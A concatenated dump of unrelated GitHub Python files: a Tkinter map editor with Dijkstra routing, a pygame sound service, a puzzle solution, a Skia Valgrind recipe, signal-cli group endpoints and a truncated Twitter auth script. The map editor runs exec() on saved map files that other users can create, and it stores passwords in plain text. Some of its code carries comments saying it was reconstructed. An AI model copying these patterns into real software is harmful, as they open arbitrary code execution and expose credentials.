#https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n    #Image from https://icons.wxug.com/logos/PNG/wundergroundLogo_4c.png\n    data.image = None\n    data.wuimage = PhotoImage(file = \"wu.gif\")\n    data.wuimage = data.wuimage.subsample(4, 4)\n    data.hlcolors = [\"green\", \"orange\", \"dodger blue\"]\n    #Button Code taken from Misc Tkinter Demos on Course Webpage\n    #https://www.cs.cmu.edu/~112/notes/button-demo1.py\n    #https://www.cs.cmu.edu/~112/notes/button-demo2.py\n    buttonFrame = 
Frame(data.root)\n editB = Button(buttonFrame, text = \"EDIT\", font = \"Times 32\",\n command=lambda:onButton(data,\"edit\"))\n editB.grid(row=0,column=1)\n browseB = Button(buttonFrame, text = \"BROWSE\", font = \"Times 32\",\n command=lambda:onButton(data,\"browse\"))\n browseB.grid(row=0,column=0)\n homeB = Button(data.root, text = \"HOME\", font = \"Times 32\",\n command=lambda:onButton(data,\"home\"))\n homeB.pack()\n buttonFrame.pack(side=BOTTOM)\n\ndef choose(message, title, options):\n #Taken from Misc Tkinter Demos on course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msg = message + \"\\n\" + \"Choose one:\"\n for i in range(len(options)):\n msg += \"\\n\" + str(i+1) + \": \" + options[i]\n response = simpledialog.askstring(title, msg)\n return int(response)\n\ndef onButton(data, buttonId):\n #Button clicked, as taken from course website\n #https://www.cs.cmu.edu/~112/notes/button-demo1.py\n #https://www.cs.cmu.edu/~112/notes/button-demo2.py\n if(buttonId == \"edit\"): \n data.screen = \"edit\"\n #Taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msgC = \"Enter City:\"\n msgSt = \"Enter State (abbreviated):\"\n titleC = \"CITY\"\n titleSt = \"STATE\"\n city = simpledialog.askstring(titleC, msgC)\n city = city.replace(\" \", \"_\")\n state = simpledialog.askstring(titleSt, msgSt)\n data.mapStr += \"city = !%s!\\nstate = !%s!\" % (city, state)\n useAPIOnce()\n msgW = \"How much do you want to walk outdoors?\"\n msgS = \"Are stairs an issue?\"\n titleW = \"WEATHER\"\n titleS = \"ACCESSIBILITY\"\n optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n optionsW.append(\"I'd like to walk inside\")\n optionsS = [\"I don't mind stairs\",\"I'd rather not traverse stairs\"]\n optionsS.append(\"Avoid stairs\")\n responseW = choose(msgW, titleW, optionsW)\n responseS = choose(msgS, titleS, optionsS)\n data.wp = responseW - 2\n data.sp = responseS - 1\n msgPic = \"Enter the name of your picture (include .gif)\"\n msgPic += \"\\n(type \\'grid\\' if you simply want a grid and no picture)\"\n titlePic = \"TITLE\"\n #Do not ask if editing saved map with pic\n if(data.image == None):\n data.image = simpledialog.askstring(titlePic, msgPic)\n if(data.image != \"grid\"):\n #Image Code taken from Misc Tkinter Demos on course webpage\n #https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n data.mapStr += \"\\ndata.image=PhotoImage(file = !%s!)\"%data.image\n data.image = PhotoImage(file = data.image)\n elif(buttonId == \"browse\"): \n data.screen = \"browse\"\n elif(buttonId == \"home\"):\n data.screen = \"home\"\n data.image = None\n data.map = Map()\n data.path = None\n data.circs = []\n\ndef save(data):\n #Save map to txt file\n #Dialog code taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n titleFile = \"SAVE\"\n msgFile = \"What would you like to save this map as (include .txt)\"\n data.fileName = simpledialog.askstring(titleFile, msgFile)\n data.fileName = data.user + \"_\" + data.fileName\n #File IO Code taken from string notes in course Webpage\n #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n with open(data.fileName, \"wt\") as f:\n f.write(data.mapStr)\n userDict[data.userkey].add(data.fileName)\n with open(\"users.txt\", \"wt\") as f:\n f.write(repr(userDict))\n\ndef mousePressed(event, data):\n #Manipulate the map depending on the mode\n if(data.screen == \"edit\"):\n #Save button clicked\n if((data.width - 80 < event.x) and (event.x < 
data.width) and \n            (data.height - 40 < event.y) and (event.y < data.height)):\n            save(data)\n        #Reconstructed: the click-bounds condition below was garbled in the source text;\n        #any node/edge editing handlers that originally preceded it may be missing here\n        for node in data.map.nodes:\n            if((event.x <= node.x+data.r)and(event.x >= node.x-data.r)and\n               (event.y <= node.y+data.r)and(event.y >= node.y-data.r)):\n                if(node == data.start):\n                    data.start = None\n                    data.circs = []\n                    data.path = None\n                    return\n                if(data.start == None):\n                    #Set start node for dijkstra\n                    data.start = node\n                    data.circs.append((node.x, node.y))\n                elif(data.end == None):\n                    #Set end node for dijkstra\n                    data.end = node\n                    data.path = data.map.dijkstra(data.start, data.end, \n                                                  data.pathindex)\n                    data.circs.append((node.x, node.y))\n                    if(data.path == \"error\"):\n                        #Path not possible, notify user and reset data.end\n                        data.end = None \n                        data.circs.pop()\n                        data.path = None\n                        #Warning box from Misc Tkinter Demos, course webpage\n                        #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n                        msg = \"The node you are trying to reach is not\"\n                        msg += \" connected to the node previously selected\"\n                        messagebox.showwarning(\"ERROR: INVALID PATH\", msg)\n                        return\n                else:\n                    #Reset with new start\n                    data.start = node\n                    data.end = None\n                    data.path = []\n                    data.circs = [(node.x, node.y)]\n    elif(data.screen == \"browse\"):\n        findClick(data, event.x, event.y)\n\ndef findClick(data, x, y):\n    #Determines which file was clicked\n    #File IO code taken from course webpage for strings notes\n    #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n    for i in range(len(data.fileSpots1)):\n        (x1, y1, x2, y2) = data.fileSpots1[i]\n        if((x1 < x) and (x < x2) and (y1 < y) and (y < y2)):\n            found = data.userList[i]\n            if(found == data.clicked):\n                #Second Click\n                with open(data.clicked, \"rt\") as f:\n                    #Update data.mapStr\n                    data.mapStr = f.read()\n                data.map = Map()\n                data.path = None\n                data.image = None\n                #Get user preferences again\n                #Taken from Misc Tkinter Demos on Course webpage\n                #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n                msgW = \"How much do you want to walk outdoors?\"\n                msgS = \"Are stairs an issue?\"\n                titleW = \"WEATHER\"\n                titleS = \"ACCESSIBILITY\"\n                optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n                optionsW.append(\"I'd like to walk inside\")\n                optionsS = [\"I don't mind stairs\"]\n                optionsS.append(\"I'd rather not traverse stairs\")\n                optionsS.append(\"Avoid stairs\")\n                responseW = choose(msgW, titleW, optionsW)\n                responseS = choose(msgS, titleS, optionsS)\n                data.wp = responseW - 2\n                data.sp = responseS - 1\n                exec(data.mapStr.replace(\"!\", \"\\'\"))\n                data.nextchar=chr(ord(\"a\")+(len(data.map.nodes)%26))\n                data.screen = \"edit\"\n                useAPIOnce()\n            else:\n                #First Click\n                data.clicked = found\n            return\n    for i in range(len(data.fileSpots2)):\n        (x1, y1, x2, y2) = data.fileSpots2[i]\n        if((x1 < x) and (x < x2) and (y1 < y) and (y < y2)):\n            found = data.otherList[i]\n            if(found == data.clicked):\n                #Second Click\n                with open(data.clicked, \"rt\") as f:\n                    #Update data.mapStr\n                    data.mapStr = f.read()\n                data.map = Map()\n                data.path = None\n                data.image = None\n                #Taken from Misc Tkinter Demos on Course webpage\n                #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n                #Get user preferences again\n                msgW = \"How much do you want to walk outdoors?\"\n                msgS = \"Are stairs an issue?\"\n                titleW = \"WEATHER\"\n                titleS = \"ACCESSIBILITY\"\n                optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n                optionsW.append(\"I'd like to walk inside\")\n                optionsS = [\"I don't mind stairs\"]\n                optionsS.append(\"I'd rather not traverse stairs\")\n                optionsS.append(\"Avoid stairs\")\n                responseW = choose(msgW, titleW, optionsW)\n                responseS = choose(msgS, titleS, optionsS)\n                data.wp = 
responseW - 2\n                data.sp = responseS - 1\n                exec(data.mapStr.replace(\"!\", \"\\'\"))\n                data.nextchar=chr(ord(\"a\")+(len(data.map.nodes)%26))\n                data.screen = \"edit\"\n                useAPIOnce()\n                \n            else:\n                #First Click\n                data.clicked = found\n            return\n    #Nothing was clicked\n    data.clicked = None\n\ndef keyPressed(event, data):\n    #Change mode depending on key press\n    if(data.screen == \"edit\"):\n        if((data.mode == \"node\") and (event.char == \"n\")):\n            #Unselect mode\n            data.mode = \"\"\n            return\n        if((data.mode == \"edge\") and (event.char == \"e\")):\n            #Unselect mode\n            data.mode = \"\"\n            return\n        #Change mode\n        if(event.char == \"n\"):\n            data.mode = \"node\"\n        elif(event.char == \"e\"):\n            data.mode = \"edge\"\n        if(data.mode == \"node\"):\n            #Undo/redo for nodes\n            if(event.char == \"u\"):\n                data.undoN.append(data.map.nodes.pop()) #set.pop() removes an arbitrary node, not necessarily the newest\n            if((event.char == \"r\") and (data.undoN != [])):\n                data.map.nodes.add(data.undoN.pop())\n        #Change weighting preference and calculate new path\n        if(event.keysym == \"Left\"):\n            data.pathindex = (data.pathindex - 1) % 3\n            if((data.path != None) and (data.start != None) and \n               (data.end != None)):\n                data.path = data.map.dijkstra(data.start, data.end, \n                                              data.pathindex)\n        if(event.keysym == \"Right\"):\n            data.pathindex = (data.pathindex + 1) % 3\n            if((data.path != None) and (data.start != None) and \n               (data.end != None)):\n                data.path = data.map.dijkstra(data.start, data.end, \n                                              data.pathindex)\n\ndef timerFired(data, canvas):\n    #Redraw new random home background\n    if(data.screen == \"home\" or data.screen == \"browse\"):\n        drawBackground(data, canvas)\n\ndef drawBackground(data, canvas):\n    #Draws opaque gray background on home screen\n    for i in range(50):\n        x1 = random.randint(-5 * data.width, 0)\n        x2 = random.randint(0, 5 * data.width)\n        y1 = random.randint(-5 * data.height, 0)\n        y2 = random.randint(0, 5 * data.height)\n        canvas.create_line(x1, y1, x2, y2, fill = \"lavender\", width = 5)\n\ndef redrawAll(canvas, data):\n    #Draw front end\n    if(data.screen == \"home\"):\n        #Print title and directions\n        drawBackground(data, canvas)\n        canvas.create_text(data.width//2, data.height//2-100, text=\"PYTHONEAS\",\n                           font = \"Times 96\")\n        directions1 = \"Create custom maps or edit existing ones\"\n        directions2 = \"with shortest mapping capabilities via Dijkstra's\"\n        directions2 += \" Algorithm.\"\n        directions3 = \"Go deeper than distance with custom weighting options\"\n        directions4 = \"such as weather and accessibility to find multiple \"\n        directions4 += \"viable paths.\"\n        directsb=\"Click \\'Browse\\' to open maps created by you and other users.\"\n        directse = \"Click \\'Edit\\' to start a new map from scratch.\"\n        canvas.create_text(data.width//2, data.height//2 + 30, text=directions1,\n                           font = \"Times 20\")\n        canvas.create_text(data.width//2, data.height//2 + 50, text=directions2,\n                           font = \"Times 20\")\n        canvas.create_text(data.width//2, data.height//2 + 70, text=directions3,\n                           font = \"Times 20\")\n        canvas.create_text(data.width//2, data.height//2 + 90, text=directions4,\n                           font = \"Times 20\")\n        canvas.create_text(data.width//2, data.height//2 + 110, text=directsb,\n                           font = \"Times 20\")\n        canvas.create_text(data.width//2, data.height//2 + 130, text=directse,\n                           font = \"Times 20\")\n        #Sign in\n        if(data.user == None):\n            titleUse = \"USER\"\n            msgUse = \"Enter your username:\"\n            data.user = simpledialog.askstring(titleUse, msgUse)\n            titlePass = \"PASSWORD\"\n            msgPass = \"Enter your password:\"\n            data.password = simpledialog.askstring(titlePass, msgPass)\n            data.userkey = data.user + 
data.password\n            if(data.userkey not in userDict):\n                userDict[data.userkey] = set()\n                #File IO code taken from strings section of course webpage\n                #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n                with open(\"users.txt\", \"wt\") as f:\n                    f.write(repr(userDict))\n\n    elif(data.screen == \"edit\"):\n        #Draw grid/pic\n        drawGrid(canvas, data)\n        if(data.image != \"grid\"):\n            canvas.create_image(data.width//2, data.height//2, image=data.image)\n        #Draw elements\n        drawCircs(canvas, data)\n        drawEdges(canvas, data, data.pathindex)\n        drawNodes(canvas, data)\n        if(data.path != None):\n            drawPath(canvas, data)\n        #Print directions\n        directions5 = \"N - Node Mode\"\n        directions5 += \"\\nE - Edge Mode\"\n        canvas.create_text(5, 5, text = directions5, anchor = NW, \n                           font = \"Times 16\")\n        if(data.mode == \"node\"):\n            nodedir = \"Click where you wish to add a node\"\n            nodedir2 = \"\\nPress N to exit Node Mode\"\n            canvas.create_text(data.width-40, 20, text=\"NODE\", font=\"Times 18\")\n            canvas.create_text(data.width, 60, text = nodedir,\n                               anchor = SE, font = \"Times 16\")\n            canvas.create_text(data.width, 80, text = nodedir2,\n                               anchor = SE, font = \"Times 16\")\n        elif(data.mode == \"edge\"):\n            edgedir = \"Click 2 nodes you wish to connect with an edge\"\n            edgedir2 = \"\\nPress E to exit Edge Mode\"\n            canvas.create_text(data.width-40, 20, text=\"EDGE\", font=\"Times 18\")\n            canvas.create_text(data.width, 60, text = edgedir,\n                               anchor = SE, font = \"Times 16\")\n            canvas.create_text(data.width, 80, text = edgedir2,\n                               anchor = SE, font = \"Times 16\")\n        else:\n            dijkdir = \"Click a start node and an end node\"\n            dijkdir2 = \"\\nClick the node again to undo your selection\"\n            canvas.create_text(data.width, 60, text = dijkdir,\n                               anchor = SE, font = \"Times 16\")\n            canvas.create_text(data.width, 80, text = dijkdir2,\n                               anchor = SE, font = \"Times 16\")\n        options = [\"DISTANCE\", \"WEATHER\", \"ACCESSIBILITY\"]\n        canvas.create_text(data.width - 60, 20,\n                           text = options[data.pathindex], font =\"Times 16\")\n        canvas.create_line(data.width - 198, 20, data.width - 122, 20, \n                           fill = data.hlcolors[data.pathindex], width = 5)\n        #Print Buttons\n        canvas.create_rectangle(data.width-80, data.height-40, data.width, \n                                data.height, fill = \"Black\")\n        canvas.create_text(data.width - 40, data.height - 20, text = \"SAVE\",\n                           font = \"Times 16\", fill = \"White\")\n        rectBounds = [(2, 42, 158, 78), (1, 82, 158, 118), (2, 122, 158, 158)]\n        canvas.create_rectangle(rectBounds[data.pathindex], \n                                fill = data.hlcolors[data.pathindex])\n        canvas.create_rectangle(5, 45, 155, 75, fill = \"black\")\n        canvas.create_rectangle(5, 85, 155, 115, fill = \"black\")\n        canvas.create_rectangle(5, 125, 155, 155, fill = \"black\")\n        butcs = [\"white\"]*3\n        #Highlight clicked preference\n        butcs[data.pathindex] = data.hlcolors[data.pathindex]\n        canvas.create_text(80,60,text=\"DISTANCE\",font=\"Times 14\",fill=butcs[0])\n        canvas.create_text(80,100,text=\"WEATHER\",font=\"Times 14\",fill=butcs[1])\n        canvas.create_text(80,140,text=\"ACCESSIBILITY\",font=\"Times 14\",\n                           fill=butcs[2])\n    elif(data.screen == \"browse\"):\n        drawBackground(data, canvas)\n        #Print files\n        colSpot = data.width//4\n        canvas.create_text(colSpot,20,text=\"YOUR MAPS\",font=\"Times 30\")\n        canvas.create_text(3*colSpot,20,text=\"OTHER MAPS\",font=\"Times 30\")\n        spacing1 = 75\n        #Find margins for clicking purposes\n        xm = 125\n        ym = 20\n        data.userList = list(userDict[data.userkey])\n        for file in userDict[data.userkey]:\n            #Highlight after one click\n            if(file == data.clicked):\n                colr 
= \"blue\"\n else:\n colr = \"black\"\n canvas.create_text(colSpot,spacing1,text=file,font=\"Times 20\",\n fill = colr)\n tup = (colSpot-xm,spacing1-ym,colSpot+xm,spacing1+ym)\n if(tup not in data.fileSpots1):\n data.fileSpots1.append(tup)\n spacing1 += 25\n spacing2 = 75\n t = 3*colSpot\n for user in userDict:\n if(user != data.userkey):\n for file in userDict[user]:\n #Highlight after one click\n if(file not in data.otherList):\n data.otherList.append(file)\n if(file == data.clicked):\n colr = \"blue\"\n else:\n colr = \"black\"\n canvas.create_text(t,spacing2,text=file,font=\"Times 20\",\n fill = colr)\n tup = (t-xm,spacing2-ym,t+xm,spacing2+ym)\n if(tup not in data.fileSpots2):\n data.fileSpots2.append(tup)\n spacing2 += 25\n browseDirections = \"Double Click to open a file\"\n canvas.create_text(data.width, data.height, text = browseDirections,\n font = \"Times 16\", anchor = SE)\n #Display Weather Underground Logo as per their requirements\n #Code taken from Misc Tkinter Demos from course webpage\n #https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n canvas.create_image(0, data.height, anchor = SW, image = data.wuimage)\n\ndef drawGrid(canvas, data):\n #Draw Background grid for edit screen\n for i in range(data.gridSpacing, data.width, data.gridSpacing):\n canvas.create_line(i, 0, i, data.height, fill = \"light sky blue\")\n for j in range(data.gridSpacing, data.height, data.gridSpacing):\n canvas.create_line(0, j, data.width, j, fill = \"light sky blue\")\n\ndef drawCircs(canvas, data):\n #Show start and end node\n rad = data.r + 5\n for circ in data.circs:\n canvas.create_oval(circ[0] - rad, circ [1] - rad, circ[0] + rad,\n circ[1] + rad, fill = \"seashell4\")\n \ndef drawNodes(canvas, data, col = \"black\", txt = \"white\"):\n #Draw all nodes with labels\n for node in data.map.nodes:\n canvas.create_oval(node.x - data.r, node.y - data.r, node.x + data.r, \n node.y + data.r, fill = col)\n #canvas.create_text(node.x, node.y, text = str(node.name), \n #font = \"Times 16\", fill = txt)\n\ndef drawEdges(canvas, data, i = 0, txt = \"grey\"):\n #Draw all edges with labels\n for node in data.map.nodes:\n for adj in node.adjs:\n [x1, y1, x2, y2] = node.adjs[adj].getCoords()\n if((data.pathindex == 2) and (node.adjs[adj].weights[2]==math.inf)):\n #Make red if stairs and wished to be avoided\n canvas.create_line(x1, y1, x2, y2, fill = \"red\")\n else:\n canvas.create_line(x1, y1, x2, y2, fill = \"black\")\n (x, y) = ((x1+x2)/2, (y1+y2)/2)\n if(node.adjs[adj].weights[data.pathindex] == math.inf):\n t = \"inf\"\n else:\n t = str(int(node.adjs[adj].weights[data.pathindex]))\n canvas.create_text(x, y, text = t, fill = txt, font = \"Times 10\")\n\ndef drawPath(canvas, data):\n #Draw the path\n drawPathEdges(canvas, data, data.pathindex)\n drawPathNodes(canvas, data)\n\ndef drawPathEdges(canvas, data, ind = 0):\n #Highlight edges in path\n for i in range(0, len(data.path) - 1):\n node1 = data.path[i]\n node2 = data.path[i+1]\n [x1, y1, x2, y2] = [node1.x, node1.y, node2.x, node2.y]\n #Use different colors for highlight\n canvas.create_line(x1, y1, x2, y2, fill = data.hlcolors[data.pathindex],\n width = 10)\n (x, y) = ((x1+x2)/2, (y1+y2)/2)\n if(node1.adjs[node2].weights[data.pathindex] == math.inf):\n t = \"inf\"\n else:\n t = str(int(node1.adjs[node2].weights[data.pathindex]))\n canvas.create_rectangle(x - 10, y - 5, x + 10, y + 5, fill = \"black\")\n canvas.create_text(x, y,text = t, fill = data.hlcolors[data.pathindex],\n font = \"Times 10\")\n\ndef drawPathNodes(canvas, data):\n #Highlight 
nodes in path\n    for node in data.path:\n        #Use different colors for highlight\n        canvas.create_oval(node.x - data.r, node.y - data.r, node.x + data.r, \n                           node.y + data.r, fill=data.hlcolors[data.pathindex])\n        #canvas.create_text(node.x, node.y, text = str(node.name), \n                           #font = \"Times 16\", fill = \"black\")\n\ndef run(width=300, height=300):\n    #Taken from course webpage\n    def redrawAllWrapper(canvas, data):\n        canvas.delete(ALL)\n        canvas.create_rectangle(0, 0, data.width, data.height,\n                                fill='white', width=0)\n        redrawAll(canvas, data)\n        canvas.update()    \n\n    def mousePressedWrapper(event, canvas, data):\n        mousePressed(event, data)\n        redrawAllWrapper(canvas, data)\n\n    def keyPressedWrapper(event, canvas, data):\n        keyPressed(event, data)\n        redrawAllWrapper(canvas, data)\n\n    def timerFiredWrapper(canvas, data):\n        timerFired(data, canvas)\n        redrawAllWrapper(canvas, data)\n        # pause, then call timerFired again\n        canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n    # Set up data and call init\n    class Struct(object): pass\n    data = Struct()\n    data.width = width\n    data.height = height\n    data.timerDelay = 3000 # milliseconds\n\n    # create the root and the canvas (Note Change: do this BEFORE calling init!)\n    root = Tk()\n\n    #For buttons to access root\n    data.root = root\n\n    init(data)\n    canvas = Canvas(root, width=data.width, height=data.height)\n    canvas.pack()\n    # set up events (the event strings were stripped in extraction; these are the standard framework bindings)\n    root.bind(\"<Button-1>\", lambda event:\n              mousePressedWrapper(event, canvas, data))\n    root.bind(\"<Key>\", lambda event:\n              keyPressedWrapper(event, canvas, data))\n    timerFiredWrapper(canvas, data)\n    # and launch the app\n    root.mainloop()  # blocks until window is closed\n\n    print(\"bye!\")\nrun(1000, 600)","repo_name":"ChrisWallace2020/Pythoneas","sub_path":"Pyhtoneas.py","file_name":"Pyhtoneas.py","file_ext":"py","file_size_in_byte":39170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74886237924","text":"import random\n\nimport pygame\n\nfrom paths import AUDIO_DIR\n\n\nclass MusicService:\n    @staticmethod\n    def get_background_musics():\n        return [\n            #AUDIO_DIR / \"CookieGameOST_menu.mp3\",\n            #AUDIO_DIR / \"CookieGameOST_game.mp3\",\n            AUDIO_DIR / \"game1.mp3\",\n            AUDIO_DIR / \"game2.mp3\",\n            AUDIO_DIR / \"game3.mp3\",\n            AUDIO_DIR / \"game4.mp3\",\n            AUDIO_DIR / \"game5.mp3\"\n        ]\n\n    @staticmethod\n    def get_chop_musics():\n        return [\n            AUDIO_DIR / \"chop.wav\",\n            AUDIO_DIR / \"chop_2.wav\",\n            AUDIO_DIR / \"chop_3.wav\"\n        ]\n\n    @staticmethod\n    def get_cheer_musics():\n        return [\n            AUDIO_DIR / \"cheer.wav\",\n            AUDIO_DIR / \"cheer_2.wav\",\n            AUDIO_DIR / \"cheer_3.wav\",\n            AUDIO_DIR / \"cheer_4.wav\"\n        ]\n\n    @staticmethod\n    def get_death_sound():\n        return [\n            AUDIO_DIR / \"hit1.mp3\",\n            AUDIO_DIR / \"hit2.mp3\"\n        ]\n\n    @staticmethod\n    def start_background_music():\n        if pygame.mixer.music.get_busy():\n            return\n\n        musics = MusicService.get_background_musics()\n\n        filename = random.choice(musics)\n        pygame.mixer.music.load(filename)\n        pygame.mixer.music.play()\n\n    @staticmethod\n    def play_chop_sound():\n        musics = MusicService.get_chop_musics()\n        filename = random.choice(musics)\n        chop = pygame.mixer.Sound(filename)\n        pygame.mixer.Sound.play(chop)\n\n    @staticmethod\n    def play_score_sound():\n        score_sfx = pygame.mixer.Sound(AUDIO_DIR / \"score.wav\")\n        pygame.mixer.Sound.play(score_sfx)\n\n    @staticmethod\n    def play_gift_spawn_sound():\n        gspawn_sfx = pygame.mixer.Sound(AUDIO_DIR / \"spawngift.wav\")\n        pygame.mixer.Sound.play(gspawn_sfx)\n\n    @staticmethod\n    def 
play_gift_bonus_sound():\n        gbonus_sfx = pygame.mixer.Sound(AUDIO_DIR / \"bonussound.wav\")\n        pygame.mixer.Sound.play(gbonus_sfx)\n\n    @staticmethod\n    def play_slap_sound():\n        slap_sfxs = MusicService.get_death_sound()\n        deathfile = pygame.mixer.Sound(random.choice(slap_sfxs))\n        pygame.mixer.Sound.play(deathfile)\n\n    @staticmethod\n    def play_cheer_sound():\n        musics = MusicService.get_cheer_musics()\n        filename = random.choice(musics)\n        cheer = pygame.mixer.Sound(filename)\n        pygame.mixer.Sound.play(cheer)\n","repo_name":"GDcocos12/SaveTheCookie","sub_path":"src/services/music_service.py","file_name":"music_service.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5279871505","text":"# BOJ 1080: Matrix\nimport sys\nN,M = map(int, sys.stdin.readline().split())\nA = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\nB = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\nans = 0\nsub = [(0,0),(0,1),(0,2),(1,0),(1,1),(1,2),(2,0),(2,1),(2,2)] # 3*3 offsets from the current position\nfor i in range(N-2):\n    for j in range(M-2):\n        if A[i][j] != B[i][j]: # if A and B differ at the current position, flip the 3*3 block\n            for k in range(len(sub)):\n                y = i+sub[k][0]\n                x = j+sub[k][1]\n                if y >= 0 and x >= 0 and y < N and x < M:\n                    B[y][x] = 1 - B[y][x] # 1 -> 0, 0 -> 1\n            ans += 1\nfor i in range(N):\n    for j in range(M):\n        if A[i][j] != B[i][j]:\n            ans = -1\n            break\nprint(ans)","repo_name":"Kim-Hyunjo/algorithm","sub_path":"study1/BOJ_1080.py","file_name":"BOJ_1080.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12744384785","text":"import gn_flavor\n\n\n\"\"\"Utils for running under Valgrind.\"\"\"\n\n\nclass ValgrindFlavorUtils(gn_flavor.GNFlavorUtils):\n  def __init__(self, m):\n    super(ValgrindFlavorUtils, self).__init__(m)\n    self._suppressions_file = self.m.path['start_dir'].join(\n        'skia', 'tools', 'valgrind.supp')\n    self._valgrind_cipd_dir = self.m.vars.slave_dir.join('valgrind')\n    self._valgrind_fake_dir = self._valgrind_cipd_dir\n    self._valgrind = self._valgrind_fake_dir.join('bin', 'valgrind')\n    self._lib_dir = self._valgrind_fake_dir.join('lib', 'valgrind')\n\n  def step(self, name, cmd, **kwargs):\n    new_cmd = [self._valgrind, '--gen-suppressions=all', '--leak-check=full',\n               '--track-origins=yes', '--error-exitcode=1', '--num-callers=40',\n               '--suppressions=%s' % self._suppressions_file]\n    path_to_app = self.m.vars.skia_out.join(cmd[0])\n    new_cmd.append(path_to_app)\n    new_cmd.extend(cmd[1:])\n    with self.m.env({'VALGRIND_LIB': self._lib_dir}):\n      return self.m.run(self.m.step, name, cmd=new_cmd, **kwargs)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/infra/bots/recipe_modules/flavor/valgrind_flavor.py","file_name":"valgrind_flavor.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"14969568842","text":"from typing import Any, List\n\nfrom fastapi import APIRouter\n\nfrom signal_cli_rest_api.app.config import settings\nfrom signal_cli_rest_api.app.schemas import GroupCreate, GroupOut, GroupUpdate\nfrom signal_cli_rest_api.app.utils import (read_groups, run_signal_cli_command,\n                                           save_attachment)\n\nrouter = APIRouter()\n\n\n@router.get(\"/{number}\", response_model=List[GroupOut])\nasync def get_groups(number: str, detailed: bool = False) -> Any:\n    \"\"\"\n    get groups\n    \"\"\"\n\n    cmd = [\"-u\", 
number, \"listGroups\"]\n\n if detailed:\n cmd.append(\"-d\")\n\n response = await run_signal_cli_command(cmd)\n\n groups = read_groups(response)\n\n return groups\n\n\n@router.post(\"/{number}\", status_code=201, response_model=GroupOut)\nasync def create_group(group: GroupCreate, number: str) -> Any:\n \"\"\"\n Create Group\n \"\"\"\n\n cmd = [\"updateGroup\", \"-n\", group.name]\n\n if group.avatar:\n cmd.append(\"-a\")\n await save_attachment(group.avatar)\n cmd.append(f\"{settings.signal_upload_path}{group.avatar.filename}\")\n\n cmd += [\"-m\"]\n cmd += group.members\n\n response = await run_signal_cli_command(cmd)\n\n return GroupOut(**group.dict(), id=response.split('\"')[1])\n\n\n@router.put(\"/{number}/{id}\", response_model=GroupOut)\nasync def edit_group(id: str, group: GroupUpdate, number: str) -> Any:\n \"\"\"\n Edit a group. You can't remove a member from a group\n \"\"\"\n\n cmd = [\"-u\", number, \"updateGroup\", \"-g\", id]\n\n if group.name:\n cmd += [\"-n\", group.name]\n\n if group.avatar:\n cmd.append(\"-a\")\n await save_attachment(group.avatar)\n cmd.append(f\"{settings.signal_upload_path}{group.avatar.filename}\")\n\n if len(group.members) > 0:\n cmd += [\"-m\"]\n cmd += group.members\n\n await run_signal_cli_command(cmd)\n\n return GroupOut(**group.dict(), id=id)\n\n\n@router.delete(\"/{number}/{id}\")\nasync def leave_group_by_id(id: str, number: str) -> Any:\n \"\"\"\n leave a group by id\n \"\"\"\n\n cmd = [\"-u\", number, \"quitGroup\", \"-g\", id]\n\n await run_signal_cli_command(cmd)\n\n return id\n","repo_name":"React-Automation-Studio/React-Automation-Studio","sub_path":"signalcli/signal_cli_rest_api/app/api/api_v1/endpoints/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"52"} +{"seq_id":"28873667825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on %(date)s\n\n@author: %(username)s\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nimport json\nimport base64\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\nfrom requests.exceptions import HTTPError\n\n\n# set argument parser\nparser = argparse.ArgumentParser(description='Get junior faculty for each school.')\nparser.add_argument(\"-outdir\", type = str,\n help = \"Directory to store output of this file.\",\n default = \"data/friends\")\nparser.add_argument(\"-v\", \"--verbose\", \n help = \"Set logging level to DEBUG.\",\n action = \"store_true\")\nargs = parser.parse_args()\n\n# set logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.ERROR)\nif args.verbose:\n log.setLevel(logging.DEBUG)\nloghandler = logging.StreamHandler(sys.stderr)\nloghandler.setFormatter(logging.Formatter(\"[%(asctime)s %(message)s]\"))\nlog.addHandler(loghandler)\n\n\"\"\" STEP 0: OAuth2 Authorization \"\"\"\n\n# Load my credentials from json file\nclient_key = os.getenv('twitter_api_key')\nclient_secret = os.getenv('twitter_api_secret')\n\n# Encode my keys in base64 per instructed on \n# https://developer.twitter.com/en/docs/basics/authentication/overview/application-only\nkey_secret = '{}:{}'.format(client_key, client_secret).encode('ascii')\nb64_encoded_key = base64.b64encode(key_secret)\nb64_encoded_key = b64_encoded_key.decode('ascii')\n\n# Build authorization request \nauth_url = 'https://api.twitter.com/oauth2/token'\nauth_headers = {\n 'Authorization': 'Basic 